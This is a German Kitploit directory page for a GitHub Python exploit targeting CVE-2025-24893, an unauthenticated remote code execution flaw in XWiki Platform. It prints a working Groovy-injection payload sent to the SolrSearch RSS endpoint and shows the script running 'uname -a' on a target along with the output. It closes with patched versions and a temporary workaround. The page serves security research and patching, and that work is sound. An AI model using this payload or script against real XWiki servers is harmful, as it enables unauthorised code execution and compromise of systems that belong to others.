Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-24893 — Python-Exploit-Skript für CVE-2025-24893, eine kritische, nicht authentifizierte RCE in XWiki Platform. Führt beliebigen Groovy-Code über eine manipulierte RSS-Anfrage an den SolrSearch-Endpunkt aus. Enthält eine Bedienungsanleitung und Referenzen zur Schadensbegrenzung. | Kitploit
Tools/GitHubGitHub/b0ysie7e/cve-2025-24893
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungRemote-Access-Tool
GitHubb0ysie7e/cve-2025-24893

CVE-2025-24893

Python-Exploit-Skript für CVE-2025-24893, eine kritische, nicht authentifizierte RCE in XWiki Platform. Führt beliebigen Groovy-Code über eine manipulierte RSS-Anfrage an den SolrSearch-Endpunkt aus. Enthält eine Bedienungsanleitung und Referenzen zur Schadensbegrenzung.

Repository anzeigen
113vor 11 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Exploit für CVE-2025-24893

CVE-2025-24893 ist eine kritische, nicht authentifizierte Remote-Code-Ausführung (RCE)-Schwachstelle, die die XWiki Platform betrifft.
Diese Schwachstelle ermöglicht es jedem Gastbenutzer, beliebigen Groovy-Code einzuschleusen und auszuführen – ohne Authentifizierung – über eine speziell gestaltete RSS-Anfrage an den SolrSearch-Endpunkt.

Dies wirkt sich direkt auf die Vertraulichkeit, Integrität und Verfügbarkeit des betroffenen Systems aus.

Zusammenfassung

  • Betroffene Versionen:
    • XWiki ≥ 5.3-milestone-2 bis < 15.10.11
    • XWiki ≥ 16.0.0-rc-1 bis < 16.4.1
  • CVSS v3.1-Score: 9.8 (Kritisch)
    Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • Ausnutzbarkeit: Sehr einfach – eine einzelne HTTP-GET-Anfrage reicht aus.

⚠️ Haftungsausschluss:

Dieser Code ist ausschließlich für Bildungs- und Forschungszwecke bestimmt. Die unbefugte Nutzung auf Systemen ohne ausdrückliche Genehmigung kann einen Gesetzesverstoß darstellen. Der Autor übernimmt keine Verantwortung für Missbrauch oder böswillige Aktivitäten im Zusammenhang mit diesem Tool.

Proof-of-Concept (POC)

root@kitploit:~
GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=}}}{{async async=false}}{{groovy}}println("Hello from search text:42"){{/groovy}}{{/async}}

Benutzerhandbuch für das Exploit-Skript

Dieser Abschnitt erklärt, wie Sie das Python-Exploit-Skript einrichten und ausführen, um CVE-2025-24893 auszunutzen.


root@kitploit:~
❯ python3 CVE-2025-24893.py
usage: CVE-2025-24893.py [-h] -u URL -c COMMAND
CVE-2025-24893.py: error: the following arguments are required: -u/--url, -c/--command
root@kitploit:~
❯ python3 CVE-2025-24893.py -u http://10.10.10.10:8080 -c 'uname -a'
[*] Sending payload to: http://10.10.10.10:8080/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln("uname -a".execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d

[+] Command output 'uname -a':

Linux 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux
                                  

Minderung

Aktualisierung auf korrigierte Versionen:

Um die Schwachstelle zu beheben, aktualisieren Sie XWiki auf eine der folgenden Versionen:

  • XWiki 15.10.11
  • XWiki 16.4.1
  • XWiki 16.5.0 RC1

Vorübergehende Problemumgehung:

Wenn ein Update nicht sofort möglich ist, können Sie einen vorübergehenden Fix anwenden:

  1. Bearbeiten Sie die Datei SolrSearchMacros.xml (befindet sich unter Main.SolrSearchMacros) um Zeile 955.
  2. Ersetzen Sie die Ausgabelogik, um das rawResponse-Makro mit dem auf application/xml gesetzten Inhaltstyp zu verwenden.
    Verwenden Sie die Implementierung in macros.vm in Zeile 2824 als Referenz.

Referenzen:

  • NVD - CVE-2025-24893
  • Ionix Blog
  • Miggo.io
Tool herunterladen